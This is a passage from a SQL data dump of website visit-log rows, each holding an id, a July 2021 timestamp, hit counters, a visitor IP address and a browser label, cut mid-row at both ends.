),(556780,1625846888,1,1,0,0,'173.252.107.118','other'),(556781,1625846889,1,1,0,0,'173.252.107.6','other'),(556782,1625849143,1,1,0,0,'94.153.76.218','chrome'),(556783,1625850023,1,1,0,0,'173.252.111.4','other'),(556784,1625852786,1,1,0,0,'91.196.178.196','chrome'),(556785,1625855370,1,1,0,0,'92.118.160.5','other'),(556786,1625855767,1,1,0,0,'185.237.217.11','chrome'),(556787,1625856656,1,1,0,0,'88.155.74.128','chrome'),(556788,1625857638,1,1,0,0,'66.249.70.39','chrome'),(556789,1625857689,1,1,0,0,'213.110.154.232','chrome'),(556790,1625857996,1,1,0,0,'91.196.178.123','chrome'),(556791,1625858639,1,1,0,0,'66.249.70.39','chrome'),(556792,1625859368,1,1,0,0,'185.237.217.11','chrome'),(556793,1625860317,1,1,0,0,'185.237.217.11','chrome'),(556794,1625864578,1,1,0,0,'94.153.57.74','chrome'),(556795,1625867209,1,1,0,0,'34.77.162.10','other'),(556796,1625870129,1,1,0,0,'66.249.70.37','chrome'),(556797,1625871199,1,0,1,0,'66.249.70.41',''),(556798,1625875873,1,0,1,0,'66.249.70.39',''),(556799,1625878261,1,1,0,0,'91.196.178.18','chrome'),(556800,1625880627,1,1,0,0,'85.192.11.171','chrome'),(556801,1625885446,1,1,0,0,'31.13.103.19','other'),(556802,1625891781,1,1,0,0,'91.196.178.215','chrome'),(556803,1625894389,1,1,0,0,'69.171.249.119','other'),(556804,1625895731,1,1,0,0,'91.196.178.8','chrome'),(556805,1625896577,1,1,0,0,'88.155.3.232','other'),(556806,1625899826,2,1,1,0,'66.249.70.37',''),(556807,1625902536,1,1,0,0,'91.196.178.184','other'),(556808,1625902583,1,1,0,0,'173.252.111.8','other'),(556809,1625903500,1,1,0,0,'195.234.78.8','chrome'),(556810,1625911673,1,1,0,0,'86.49.244.104','chrome'),(556811,1625911674,1,1,0,0,'31.13.127.3','other'),(556812,1625911675,1,1,0,0,'173.252.87.13','other'),(556825,1625911676,1,1,0,0,'173.252.87.1','other'),(556826,1625919342,1,1,0,0,'66.249.70.37','chrome'),(556827,1625921630,1,1,0,0,'66.249.70.37','chrome'),(556828,1625923716,1,0,1,0,'66.249.70.39',''),(556829,1625923734,1,0,1,0,'66.249.70.37',''),(556830,1625924427,1,1,0,0,'66.249.70.39','chrome'),(556831,1625933512,1,1,0,0,'37.54.19.110','other'),(556832,1625934812,1,1,0,0,'91.196.178.39','chrome'),(556833,1625935072,1,1,0,0,'66.249.70.37','chrome'),(556834,1625945761,1,1,0,0,'91.196.178.173','chrome'),(556835,1625945913,1,1,0,0,'173.252.111.1','other'),(556836,1625945914,1,1,0,0,'173.252.111.3','other'),(556837,1625947093,1,0,1,0,'66.249.70.39',''),(556838,1625949632,1,1,0,0,'185.237.217.11','chrome'),(556839,1625950140,1,1,0,0,'173.252.111.5','other'),(556840,1625950141,2,2,0,0,'173.252.111.4','other'),(556841,1625950142,1,1,0,0,'173.252.111.14','other'),(556842,1625950146,1,1,0,0,'173.252.111.119','other'),(556843,1625950153,1,1,0,0,'173.252.107.113','other'),(556844,1625950159,1,1,0,0,'173.252.87.2','other'),(556845,1625950263,1,1,0,0,'95.133.153.57','chrome'),(556846,1625950978,1,1,0,0,'69.171.251.1','other'),(556847,1625951081,1,1,0,0,'72.137.84.61','chrome'),(556848,1625952017,1,1,0,0,'185.237.217.11','chrome'),(556849,1625952454,1,1,0,0,'173.252.111.111','other'),(556850,1625952455,1,1,0,0,'173.252.111.2','other'),(556851,1625952480,1,1,0,0,'185.237.217.7','chrome'),(556852,1625957617,1,1,0,0,'46.211.44.122','chrome'),(556853,1625957623,1,1,0,0,'173.252.111.11','other'),(556856,1625957624,1,1,0,0,'173.252.111.12','other'),(556861,1625957674,1,1,0,0,'31.13.127.25','other'),(556862,1625958049,1,1,0,0,'94.153.53.183','chrome'),(556863,1625958178,1,1,0,0,'91.196.178.33','chrome'),(556864,1625962331,1,1,0,0,'198.204.234.252','chrome'),(556865,1625977562,1,1,0,0,'176.105.196.36','chrome'),(556866,1625977963,1,1,0,0,'178.133.197.151','other'),(556867,1625978167,1,1,0,0,'178.92.154.199','chrome'),(556868,1625981911,1,0,1,0,'66.249.70.39',''),(556869,1625983185,1,1,0,0,'173.252.79.19','other'),(556870,1625983187,1,1,0,0,'173.252.127.1','chrome'),(556871,1625983961,1,1,0,0,'69.171.251.15','other'),(556872,1625984071,1,1,0,0,'93.73.113.14','chrome'),(556873,1625984808,1,1,0,0,'31.13.127.24','other'),(556874,1625984810,1,1,0,0,'31.13.127.9','other'),(556875,1625984841,1,1,0,0,'31.13.127.117','other'),(556876,1625984847,1,1,0,0,'31.13.115.5','other'),(556877,1625985385,1,1,0,0,'188.163.32.225','chrome'),(556878,1625985539,1,1,0,0,'173.252.111.21','other'),(556879,1625985540,1,1,0,0,'173.252.111.5','other'),(556880,1625985541,1,1,0,0,'173.252.111.16','other'),(556881,1625986739,1,1,0,0,'91.196.178.181','other'),(556882,1625987086,1,1,0,0,'69.171.251.21','other'),(556883,1625987172,1,1,0,0,'66.220.149.9','other'),(556884,1625988718,1,1,0,0,'179.43.169.181','firefox'),(556885,1625990312,1,1,0,0,'91.196.179.85','other'),(556886,1625990715,1,1,0,0,'94.153.76.246','chrome'),(556887,1625991494,1,1,0,0,'91.196.178.152','chrome'),(556888,1625991962,1,1,0,0,'66.249.70.41','chrome'),(556889,1625992338,1,1,0,0,'193.246.149.231','chrome'),(556890,1625994826,2,2,0,0,'31.13.127.19','other'),(556891,1625995021,1,1,0,0,'173.252.111.19','other'),(556892,1625996433,1,1,0,0,'66.249.70.39','chrome'),(556893,1625996996,1,1,0,0,'69.25.58.56','chrome'),(556894,1626001335,1,1,0,0,'185.237.217.11','chrome'),(556895,1626004273,1,1,0,0,'128.124.20.162','other'),(556896,1626004429,1,1,0,0,'31.13.127.22','other'),(556897,1626006318,1,1,0,0,'46.69.200.45','chrome'),(556898,1626013641,1,1,0,0,'91.196.178.157','chrome'),(556899,1626013747,1,1,0,0,'173.252.111.14','other'),(556900,1626013748,2,2,0,0,'173.252.111.24','other'),(556902,1626013855,1,1,0,0,'69.171.231.116','other'),(556903,1626013903,1,1,0,0,'31.13.127.15','other'),(556904,1626014114,1,1,0,0,'92.118.160.17','other'),(556905,1626014317,1,1,0,0,'173.252.87.21','other'),(556906,1626014737,1,1,0,0,'91.218.89.16','chrome'),(556907,1626028215,1,1,0,0,'173.252.87.19','other'),(556908,1626028216,1,1,0,0,'173.252.87.3','other'),(556909,1626030583,1,1,0,0,'185.237.217.11','chrome'),(556910,1626038094,1,1,0,0,'66.249.70.39','chrome'),(556911,1626038272,1,1,0,0,'91.196.178.57','chrome'),(556912,1626042261,1,0,1,0,'66.249.70.41',''),(556913,1626043015,1,1,0,0,'117.216.139.109','firefox'),(556914,1626052572,1,1,0,0,'66.249.70.39','chrome'),(556915,1626075860,2,0,2,0,'66.249.70.39',''),(556916,1626076340,1,0,1,0,'66.249.70.41',''),(556917,1626086582,1,1,0,0,'31.13.103.17','other'),(556918,1626088395,1,1,0,0,'69.171.249.21','other'),(556919,1626089269,1,1,0,0,'178.133.209.195','chrome'),(556920,1626097473,1,1,0,0,'86.49.124.53','chrome'),(556921,1626111166,1,0,1,0,'66.249.70.37',''),(556922,1626113789,1,0,1,0,'66.249.70.39',''),(556923,1626118309,1,1,0,0,'173.252.111.22','other'),(556924,1626118310,1,1,0,0,'173.252.111.23','other'),(556925,1626123547,1,1,0,0,'66.249.70.37','chrome'),(556926,1626124598,1,0,1,0,'66.249.70.41',''),(556927,1626124896,1,1,0,0,'66.249.70.37','chrome'),(556928,1626157322,1,1,0,0,'34.96.130.5','other'),(556929,1626157797,1,1,0,0,'31.13.103.11','other'),(556930,1626157798,1,1,0,0,'31.13.103.18','other'),(556931,1626166492,1,1,0,0,'195.5.18.143','chrome'),(556932,1626166627,1,1,0,0,'185.237.217.11','chrome'),(556933,1626168692,1,1,0,0,'66.249.70.41','chrome'),(556934,1626170538,1,1,0,0,'95.134.170.254','chrome'),(556935,1626170541,1,1,0,0,'31.13.127.30','other'),(556939,1626170542,1,1,0,0,'31.13.127.116','other'),(556942,1626170543,1,1,0,0,'31.13.127.112','other'),(556944,1626172957,1,0,1,0,'66.249.70.37',''),(556945,1626189763,1,0,1,0,'66.249.70.39',''),(556946,1626205242,1,1,0,0,'185.237.217.7','firefox'),(556947,1626205244,1,1,0,0,'66.220.149.117','other'),(556950,1626205245,1,1,0,0,'66.220.149.24','other'),(556957,1626205311,1,1,0,0,'173.252.111.15','other'),(556958,1626209006,1,1,0,0,'66.249.70.41','chrome'),(556959,1626233331,1,1,0,0,'66.249.70.37','chrome'),(556960,1626242169,1,0,1,0,'66.249.70.37',''),(556961,1626248398,1,1,0,0,'66.249.70.37','chrome'),(556962,1626254244,1,1,0,0,'185.237.217.11','chrome'),(556963,1626254501,1,1,0,0,'173.252.111.3','other'),(556964,1626254502,1,1,0,0,'173.252.111.13','other'),(556965,1626254503,4,4,0,0,'173.252.111.12','other'),(556967,1626254504,1,1,0,0,'173.252.111.120','other'),(556968,1626254507,1,1,0,0,'173.252.111.116','other'),(556969,1626254509,1,1,0,0,'173.252.107.3','other'),(556970,1626254510,1,1,0,0,'173.252.111.7','other'),(556972,1626254511,1,1,0,0,'69.171.249.116','other'),(556973,1626254534,1,1,0,0,'66.220.149.47','other'),(556974,1626254703,1,1,0,0,'173.252.111.1','other'),(556975,1626254716,1,1,0,0,'91.196.178.68','chrome'),(556976,1626254786,1,1,0,0,'46.211.63.205','chrome'),(556977,1626254804,1,1,0,0,'173.252.95.3','other'),(556978,1626256002,1,1,0,0,'46.211.29.63','chrome'),(556979,1626256105,1,1,0,0,'69.171.249.6','other'),(556980,1626256883,1,1,0,0,'46.211.37.50','chrome'),(556981,1626257416,1,1,0,0,'46.201.112.63','chrome'),(556982,1626257861,1,1,0,0,'94.153.56.14','chrome'),(556983,1626258280,1,1,0,0,'128.124.201.86','chrome'),(556984,1626259111,1,1,0,0,'23.228.109.147','chrome'),(556985,1626259572,1,1,0,0,'94.153.87.130','chrome'),(556986,1626259899,1,1,0,0,'185.237.217.11','chrome'),(556987,1626261794,1,1,0,0,'185.237.217.11','chrome'),(556988,1626262986,1,0,1,0,'66.249.70.37',''),(556989,1626263510,1,1,0,0,'91.196.176.13','chrome'),(556990,1626264927,1,1,0,0,'185.237.217.8','chrome'),(556991,1626264930,3,3,0,0,'173.252.107.16','other'),(556992,1626264931,1,1,0,0,'173.252.107.18','other'),(556994,1626264932,1,1,0,0,'173.252.107.15','other'),(556996,1626264933,1,1,0,0,'173.252.107.9','other'),(556998,1626269640,1,1,0,0,'37.55.227.131','chrome'),(556999,1626271052,1,1,0,0,'185.237.217.11','chrome'),(557000,1626273985,1,1,0,0,'66.220.149.51','other'),(557001,1626275069,1,1,0,0,'91.196.178.179','chrome'),(557002,1626275242,1,0,1,0,'66.249.70.37',''),(557003,1626277104,1,1,0,0,'46.211.50.84','chrome'),(557004,1626277867,1,1,0,0,'173.252.111.1','other'),(557005,1626277868,2,2,0,0,'173.252.111.14','other'),(557006,1626278906,1,1,0,0,'78.159.35.62','chrome'),(557007,1626283175,2,2,0,0,'46.101.254.193','firefox'),(557009,1626283201,3,3,0,0,'148.72.22.169','firefox'),(557010,1626285761,1,1,0,0,'66.249.70.41','chrome'),(557011,1626286075,2,2,0,0,'54.203.73.198','firefox'),(557012,1626286141,1,1,0,0,'91.196.178.58','chrome'),(557013,1626286144,1,1,0,0,'173.252.107.4','other'),(557014,1626286145,1,1,0,0,'173.252.107.16','other'),(557018,1626286146,1,1,0,0,'173.252.107.7','other'),(557022,1626291379,1,1,0,0,'37.55.58.148','chrome'),(557023,1626291476,1,1,0,0,'91.196.178.136','chrome'),(557024,1626295982,1,1,0,0,'66.220.149.38','other'),(557025,1626295983,1,1,0,0,'66.220.149.3','other'),(557026,1626295986,1,1,0,0,'66.220.149.49','other'),(557027,1626310148,1,1,0,0,'195.234.78.8','chrome'),(557028,1626319498,1,0,1,0,'66.249.70.57',''),(557029,1626321799,1,1,0,0,'23.228.109.147','chrome'),(557030,1626323526,3,3,0,0,'178.128.228.54','firefox'),(557031,1626323930,2,2,0,0,'185.237.217.11','chrome'),(557032,1626325028,1,0,1,0,'66.249.70.39',''),(557033,1626327419,1,0,1,0,'66.249.70.39',''),(557034,1626329159,1,1,0,0,'173.252.79.8','other'),(557035,1626329161,1,1,0,0,'173.252.127.1','chrome'),(557036,1626329414,1,1,0,0,'173.252.111.119','other'),(557037,1626330148,2,2,0,0,'162.144.59.107','firefox'),(557039,1626337040,1,1,0,0,'69.63.184.112','other'),(557040,1626339544,1,1,0,0,'185.237.217.11','chrome'),(557041,1626350054,1,1,0,0,'69.171.249.117','other'),(557043,1626350055,1,1,0,0,'69.171.249.18','other'),(557046,1626350056,1,1,0,0,'69.171.249.119','other'),(557047,1626351403,1,1,0,0,'185.237.217.11','chrome'),(557048,1626351951,1,1,0,0,'173.252.111.13','other'),(557050,1626351952,1,1,0,0,'173.252.111.16','other'),(557051,1626351953,1,1,0,0,'173.252.111.15','other'),(557052,1626351954,1,1,0,0,'173.252.111.21','other'),(557053,1626352269,1,1,0,0,'173.252.95.6','other'),(557054,1626352457,1,1,0,0,'185.237.217.11','chrome'),(557055,1626352566,1,1,0,0,'46.164.153.23','other'),(557056,1626353638,1,1,0,0,'88.155.31.129','chrome'),(557057,1626353675,1,1,0,0,'94.153.19.183','chrome'),(557058,1626354383,1,1,0,0,'91.196.178.195','chrome'),(557059,1626355586,1,1,0,0,'46.211.55.195','chrome'),(557060,1626355804,1,1,0,0,'94.153.31.152','other'),(557061,1626356452,1,1,0,0,'91.196.178.157','chrome'),(557062,1626358875,1,1,0,0,'94.153.78.186','chrome'),(557063,1626359610,1,1,0,0,'173.252.111.1','other'),(557064,1626359629,1,1,0,0,'31.13.127.32','other'),(557065,1626359886,1,1,0,0,'46.211.15.164','chrome'),(557066,1626359887,1,1,0,0,'173.252.111.12','other'),(557067,1626359888,2,2,0,0,'173.252.111.16','other'),(557069,1626359889,1,1,0,0,'173.252.111.3','other'),(557071,1626362462,1,1,0,0,'23.228.109.147','chrome'),(557072,1626363269,1,1,0,0,'37.52.20.167','firefox'),(557073,1626371539,1,1,0,0,'173.252.95.22','other'),(557074,1626374387,2,2,0,0,'173.252.127.117','other'),(557075,1626374388,1,1,0,0,'173.252.127.22','other'),(557078,1626374389,1,1,0,0,'173.252.127.112','other'),(557079,1626375111,1,1,0,0,'31.13.115.23','other'),(557080,1626378813,1,1,0,0,'185.237.217.11','chrome'),(557081,1626380625,1,1,0,0,'92.112.124.100','chrome'),(557082,1626381366,1,1,0,0,'91.196.178.150','chrome'),(557083,1626384532,1,1,0,0,'66.249.70.25','chrome'),(557084,1626395540,1,0,1,0,'66.249.70.25',''),(557085,1626401223,1,1,0,0,'31.13.103.24','other'),(557086,1626406495,1,1,0,0,'66.249.70.29','chrome'),(557087,1626411782,1,1,0,0,'185.11.29.224','chrome'),(557088,1626412488,1,1,0,0,'185.237.217.30','chrome'),(557089,1626422279,1,1,0,0,'185.237.217.11','chrome'),(557090,1626422478,1,1,0,0,'91.196.177.176','chrome'),(557091,1626430736,1,1,0,0,'66.249.70.27','chrome'),(557092,1626433558,1,1,0,0,'45.129.18.200','chrome'),(557093,1626442145,1,0,1,0,'66.249.70.27',''),(557094,1626442759,1,1,0,0,'91.196.178.169','chrome'),(557095,1626446861,7,7,0,0,'34.221.156.35','firefox'),(557096,1626448538,1,1,0,0,'66.249.70.39','chrome'),(557097,1626452855,1,1,0,0,'173.252.87.2','other'),(557098,1626452856,1,1,0,0,'173.252.87.21','other'),(557099,1626452857,1,1,0,0,'173.252.87.13','other'),(557100,1626453623,1,1,0,0,'173.252.111.118','other'),(557101,1626455701,1,1,0,0,'91.196.178.182','chrome'),(557102,1626455704,1,1,0,0,'173.252.87.15','other'),(557103,1626455705,2,2,0,0,'173.252.87.22','other'),(557106,1626455706,1,1,0,0,'173.252.87.6','other'),(557107,1626463274,1,1,0,0,'89.184.66.143','firefox'),(557108,1626463760,1,1,0,0,'31.13.127.117','other'),(557109,1626469036,1,1,0,0,'34.86.35.19','other'),(557110,1626469455,1,0,1,0,'66.249.70.41',''),(557111,1626470356,1,1,0,0,'91.196.178.125','chrome'),(557112,1626480550,1,1,0,0,'92.118.160.1','other'),(557113,1626484695,1,1,0,0,'92.118.160.5','other'),(557114,1626484885,1,1,0,0,'195.161.114.231','firefox'),(557115,1626485342,1,1,0,0,'23.228.109.147','chrome'),(557116,1626490575,1,1,0,0,'66.249.70.41','chrome'),(557117,1626494935,1,1,0,0,'34.96.130.20','other'),(557118,1626501378,1,1,0,0,'173.252.79.28','other'),(557119,1626501382,1,1,0,0,'173.252.87.1','chrome'),(557120,1626507037,1,1,0,0,'66.249.70.37','chrome'),(557121,1626517014,1,1,0,0,'173.252.87.111','other'),(557122,1626518147,1,0,1,0,'66.249.70.39',''),(557123,1626526820,1,0,1,0,'66.249.70.39',''),(557124,1626529037,1,1,0,0,'173.252.111.11','other'),(557125,1626529038,1,1,0,0,'173.252.111.16','other'),(557128,1626529704,1,1,0,0,'173.252.111.120','other'),(557129,1626529705,1,1,0,0,'173.252.111.118','other'),(557130,1626543261,1,1,0,0,'173.252.111.4','other'),(557131,1626551513,1,1,0,0,'91.196.178.121','chrome'),(557132,1626557048,1,1,0,0,'173.252.111.13','other'),(557134,1626563675,1,1,0,0,'66.249.70.39','chrome'),(557135,1626571083,1,1,0,0,'23.228.109.147','chrome'),(557136,1626588255,1,1,0,0,'111.221.46.50','other'),(557137,1626599979,1,1,0,0,'92.118.160.17','other'),(557138,1626602913,1,1,0,0,'173.252.127.3','other'),(557139,1626613270,2,0,2,0,'66.249.70.39',''),(557140,1626621521,1,1,0,0,'31.13.127.27','other'),(557141,1626621611,1,1,0,0,'31.13.103.10','other'),(557142,1626621612,1,1,0,0,'31.13.103.6','other'),(557144,1626621613,1,1,0,0,'31.13.103.23','other'),(557146,1626628594,1,1,0,0,'114.119.157.112','other'),(557147,1626640384,1,1,0,0,'31.13.127.35','other'),(557148,1626640768,1,1,0,0,'173.252.107.117','other'),(557149,1626644113,1,1,0,0,'66.249.70.37','chrome'),(557150,1626644595,1,1,0,0,'92.118.160.61','other'),(557151,1626652156,1,1,0,0,'66.249.70.39','chrome'),(557152,1626654503,1,0,1,0,'66.249.70.41',''),(557153,1626667078,3,3,0,0,'142.93.218.96','firefox'),(557154,1626681695,1,1,0,0,'185.237.217.11','chrome'),(557155,1626693135,1,1,0,0,'66.249.93.15','chrome'),(557156,1626693136,1,1,0,0,'66.249.93.14','chrome'),(557157,1626699679,1,0,1,0,'66.249.70.39',''),(557158,1626710916,1,1,0,0,'66.249.70.39','chrome'),(557159,1626719777,1,1,0,0,'194.156.95.226','chrome'),(557160,1626719778,1,1,0,0,'194.156.95.226','other'),(557161,1626724667,1,1,0,0,'66.249.70.55','chrome'),(557162,1626725347,1,1,0,0,'23.228.109.147','chrome'),(557163,1626729931,2,2,0,0,'54.189.230.128','firefox'),(557164,1626734471,1,1,0,0,'66.249.70.55','chrome'),(557165,1626752244,1,1,0,0,'31.13.103.18','other'),(557166,1626752286,1,1,0,0,'31.13.103.117','other'),(557167,1626753079,1,1,0,0,'144.86.173.76','other'),(557168,1626756330,1,0,1,0,'66.249.70.53',''),(557169,1626758548,1,1,0,0,'31.13.127.111','other'),(557170,1626758549,1,1,0,0,'31.13.127.22','other'),(557171,1626774269,1,1,0,0,'31.13.127.118','other'),(557172,1626777596,1,1,0,0,'173.252.111.11','other'),(557173,1626803580,2,2,0,0,'94.153.40.43','chrome'),(557174,1626811120,1,1,0,0,'185.237.217.11','chrome'),(557175,1626815561,1,1,0,0,'66.249.70.53','chrome'),(557176,1626824889,1,0,1,0,'66.249.70.59',''),(557177,1626828776,1,1,0,0,'66.249.70.57','chrome'),(557178,1626844034,1,1,0,0,'144.86.173.75','other'),(557179,1626848696,1,1,0,0,'66.249.70.53','chrome'),(557180,1626853556,1,1,0,0,'66.249.70.53','chrome'),(557181,1626854866,1,0,1,0,'66.249.70.53',''),(557182,1626860056,1,1,0,0,'173.252.111.116','other'),(557183,1626870746,1,1,0,0,'31.13.115.10','other'),(557184,1626870747,1,1,0,0,'31.13.115.22','other'),(557185,1626872225,1,1,0,0,'23.228.109.147','chrome'),(557186,1626875498,2,2,0,0,'123.121.164.52','chrome'),(557187,1626875560,3,3,0,0,'23.228.109.147','chrome'),(557188,1626883122,1,1,0,0,'123.121.164.52','chrome'),(557189,1626884236,1,1,0,0,'66.249.70.59','chrome'),(557190,1626889843,1,0,1,0,'66.249.70.57',''),(557191,1626892347,1,1,0,0,'185.237.217.11','chrome'),(557192,1626899792,1,1,0,0,'173.252.111.17','other'),(557193,1626904906,1,1,0,0,'66.249.70.57','chrome'),(557194,1626910264,1,1,0,0,'89.184.66.143','firefox'),(557195,1626919697,1,1,0,0,'64.246.161.42','firefox'),(557196,1626921073,3,3,0,0,'192.169.244.239','firefox'),(557197,1626929222,1,1,0,0,'31.13.127.32','other'),(557198,1626937420,1,1,0,0,'185.237.217.11','chrome'),(557199,1626940211,3,3,0,0,'142.93.34.169','firefox'),(557200,1626943130,1,0,1,0,'66.249.70.57',''),(557201,1626945976,1,0,1,0,'66.249.70.57',''),(557202,1626947314,1,1,0,0,'66.249.70.53','chrome'),(557203,1626956207,1,0,1,0,'66.249.70.53',''),(557204,1626979728,1,1,0,0,'188.147.35.29','other'),(557205,1626983168,3,3,0,0,'139.59.33.202','firefox'),(557206,1626988995,1,1,0,0,'173.252.83.15','other'),(557207,1626988996,1,1,0,0,'173.252.83.9','other'),(557208,1626990052,1,1,0,0,'66.249.70.53','chrome'),(557209,1626992061,3,3,0,0,'122.116.248.74','firefox'),(557210,1627020349,1,1,0,0,'66.249.70.57','chrome'),(557211,1627021023,1,1,0,0,'66.249.70.59','chrome'),(557212,1627032396,1,0,1,0,'66.249.70.57',''),(557213,1627041098,1,0,1,0,'66.249.70.53',''),(557214,1627046056,1,1,0,0,'144.86.173.153','other'),(557215,1627046221,1,1,0,0,'173.252.111.4','other'),(557216,1627053594,1,1,0,0,'31.13.127.33','other'),(557217,1627069366,2,2,0,0,'173.252.111.8','other'),(557218,1627073585,1,1,0,0,'66.249.70.57','chrome'),(557219,1627075225,1,1,0,0,'66.249.70.57','chrome'),(557220,1627076982,1,1,0,0,'66.249.70.37','chrome'),(557221,1627082168,1,1,0,0,'66.249.70.39','chrome'),(557222,1627083813,2,2,0,0,'66.249.70.35','chrome'),(557223,1627084105,1,1,0,0,'66.249.70.37','chrome'),(557224,1627084273,2,1,1,0,'66.249.70.39',''),(557225,1627090542,1,1,0,0,'66.249.70.35','chrome'),(557226,1627094348,1,0,1,0,'66.249.70.35',''),(557227,1627095663,1,1,0,0,'66.249.70.35','chrome'),(557228,1627096481,1,0,1,0,'66.249.70.37',''),(557229,1627098238,1,1,0,0,'66.249.70.37','chrome'),(557230,1627098926,1,1,0,0,'66.249.70.35','chrome'),(557231,1627101704,1,1,0,0,'66.249.70.39','chrome'),(557232,1627101955,1,0,1,0,'66.249.70.35',''),(557233,1627104376,1,0,1,0,'66.249.70.35',''),(557234,1627111767,1,0,1,0,'66.249.70.39',''),(557235,1627112685,1,1,0,0,'66.249.70.39','chrome'),(557236,1627113456,2,2,0,0,'173.252.111.119','other'),(557237,1627113457,2,2,0,0,'173.252.111.8','other'),(557239,1627113649,1,1,0,0,'31.13.103.1','other'),(557240,1627113650,2,2,0,0,'31.13.103.12','other'),(557244,1627116768,1,1,0,0,'144.86.173.92','other'),(557245,1627120317,1,0,1,0,'66.249.70.35',''),(557246,1627120892,1,1,0,0,'66.249.70.39','chrome'),(557247,1627122208,1,1,0,0,'66.249.70.35','chrome'),(557248,1627123216,1,0,1,0,'66.249.70.35',''),(557249,1627124694,2,0,2,0,'66.249.70.37',''),(557250,1627125733,1,0,1,0,'66.249.70.39',''),(557251,1627128756,2,2,0,0,'66.249.70.35','chrome'),(557252,1627129378,3,3,0,0,'198.199.116.205','firefox'),(557253,1627134529,1,1,0,0,'92.118.160.13','other'),(557254,1627136782,3,3,0,0,'51.38.80.7','firefox'),(557255,1627137076,1,0,1,0,'66.249.70.37',''),(557256,1627139624,1,1,0,0,'66.249.70.39','chrome'),(557257,1627146467,1,1,0,0,'31.13.127.112','other'),(557258,1627149449,3,3,0,0,'173.252.111.18','other'),(557260,1627149450,1,1,0,0,'173.252.111.23','other'),(557261,1627155543,1,1,0,0,'45.129.18.114','chrome'),(557262,1627155636,1,1,0,0,'66.249.70.37','chrome'),(557263,1627156972,1,0,1,0,'66.249.70.39',''),(557264,1627169770,1,0,1,0,'66.249.70.39',''),(557265,1627176099,1,1,0,0,'66.249.70.37','chrome'),(557266,1627190137,1,1,0,0,'92.118.160.9','other'),(557267,1627198848,1,1,0,0,'92.118.160.13','other'),(557268,1627199342,1,1,0,0,'173.252.111.9','other'),(557269,1627199862,1,1,0,0,'34.238.125.253','firefox'),(557270,1627210647,1,0,1,0,'66.249.70.39',''),(557271,1627210651,1,0,1,0,'66.249.70.37',''),(557272,1627218564,1,1,0,0,'66.249.70.37','chrome'),(557273,1627222787,1,1,0,0,'66.249.70.37','chrome'),(557274,1627235621,1,1,0,0,'92.118.160.13','other'),(557275,1627238105,1,1,0,0,'92.118.160.17','other'),(557276,1627244764,1,1,0,0,'173.252.111.6','other'),(557277,1627247604,1,1,0,0,'92.118.160.1','other'),(557278,1627254400,1,1,0,0,'34.223.250.58','chrome'),(557279,1627268113,1,1,0,0,'23.228.109.147','other'),(557280,1627272674,1,1,0,0,'31.13.103.9','other'),(557281,1627274538,1,0,1,0,'66.249.70.37',''),(557282,1627285612,2,2,0,0,'66.249.70.39','chrome'),(557283,1627285634,1,1,0,0,'213.133.167.226','firefox'),(557284,1627289445,1,0,1,0,'66.249.70.39',''),(557285,1627295398,2,2,0,0,'185.151.125.197','chrome'),(557286,1627304708,1,1,0,0,'23.228.109.147','chrome'),(557287,1627306668,1,1,0,0,'185.42.129.20','chrome'),(557288,1627317725,1,1,0,0,'66.249.70.41','chrome'),(557289,1627323962,1,1,0,0,'208.110.85.68','chrome'),(557290,1627330550,1,1,0,0,'66.249.70.35','chrome'),(557291,1627339414,1,1,0,0,'66.249.70.39','chrome'),(557292,1627346098,1,0,1,0,'66.249.70.35',''),(557293,1627347301,1,1,0,0,'66.249.70.39','chrome'),(557294,1627358265,1,1,0,0,'66.249.70.53','chrome'),(557295,1627360923,1,1,0,0,'31.13.103.18','other'),(557296,1627376841,2,2,0,0,'91.196.178.90','chrome'),(557297,1627383535,1,0,1,0,'66.249.70.55',''),(557298,1627389083,1,1,0,0,'173.252.111.19','other'),(557299,1627412844,1,1,0,0,'124.126.78.140','chrome'),(557300,1627414786,1,1,0,0,'69.171.251.119','other'),(557301,1627415618,1,1,0,0,'173.252.111.16','other'),(557302,1627441834,1,0,1,0,'66.249.70.55',''),(557303,1627447078,1,1,0,0,'95.93.237.162','other'),(557304,1627448269,1,1,0,0,'66.249.70.53','chrome'),(557305,1627449307,1,0,1,0,'66.249.70.55',''),(557306,1627462641,1,1,0,0,'173.252.111.13','other'),(557307,1627464363,1,1,0,0,'66.249.70.55','chrome'),(557308,1627465586,1,1,0,0,'66.249.70.53','chrome'),(557309,1627467440,1,1,0,0,'173.252.111.2','other'),(557310,1627467441,1,1,0,0,'173.252.111.13','other'),(557311,1627469856,1,0,1,0,'66.249.70.53',''),(557312,1627469859,2,0,2,0,'66.249.70.55',''),(557313,1627474869,1,1,0,0,'144.86.173.24','other'),(557314,1627477187,1,1,0,0,'31.13.127.112','other'),(557315,1627485028,1,1,0,0,'123.160.235.149','other'),(557316,1627487000,2,2,0,0,'185.237.217.11','chrome'),(557317,1627488738,1,1,0,0,'74.125.151.57','other'),(557318,1627501050,1,1,0,0,'42.236.10.75','chrome'),(557319,1627501066,1,1,0,0,'42.236.10.93','chrome'),(557320,1627501148,1,1,0,0,'42.236.10.78','chrome'),(557321,1627501165,1,1,0,0,'42.236.10.84','chrome'),(557322,1627501233,1,1,0,0,'171.13.14.12','chrome'),(557323,1627501235,1,1,0,0,'171.13.14.23','chrome'),(557324,1627507808,1,1,0,0,'162.55.52.73','firefox'),(557325,1627516191,1,0,1,0,'66.249.70.61',''),(557326,1627524136,1,1,0,0,'31.13.103.3','other'),(557327,1627534999,1,1,0,0,'31.13.103.23','other'),(557329,1627536426,1,1,0,0,'23.228.109.147','other'),(557330,1627539693,3,3,0,0,'134.209.147.60','firefox'),(557331,1627540587,1,1,0,0,'23.228.109.147','other'),(557332,1627542470,1,1,0,0,'66.249.70.59','chrome'),(557333,1627544552,1,0,1,0,'66.249.70.61',''),(557334,1627549391,1,1,0,0,'23.228.109.147','other'),(557335,1627554717,1,0,1,0,'66.249.70.61',''),(557336,1627557025,1,1,0,0,'23.228.109.147','other'),(557337,1627560278,1,0,1,0,'66.249.70.57',''),(557338,1627563630,1,1,0,0,'66.249.70.59','chrome'),(557339,1627570093,1,1,0,0,'66.249.70.61','chrome'),(557340,1627572800,1,0,1,0,'66.249.70.61',''),(557341,1627580834,3,3,0,0,'167.71.69.173','firefox'),(557342,1627583776,1,1,0,0,'66.249.70.61','chrome'),(557343,1627585097,2,2,0,0,'100.21.218.158','firefox'),(557344,1627585735,2,2,0,0,'139.180.139.202','firefox'),(557346,1627597391,11,11,0,0,'93.158.161.21','other'),(557347,1627597457,3,3,0,0,'77.88.5.29','other'),(557348,1627601332,1,1,0,0,'66.249.70.59','chrome'),(557349,1627602428,1,1,0,0,'144.86.173.139','other'),(557350,1627603312,1,1,0,0,'66.249.70.57','chrome'),(557351,1627604076,1,0,1,0,'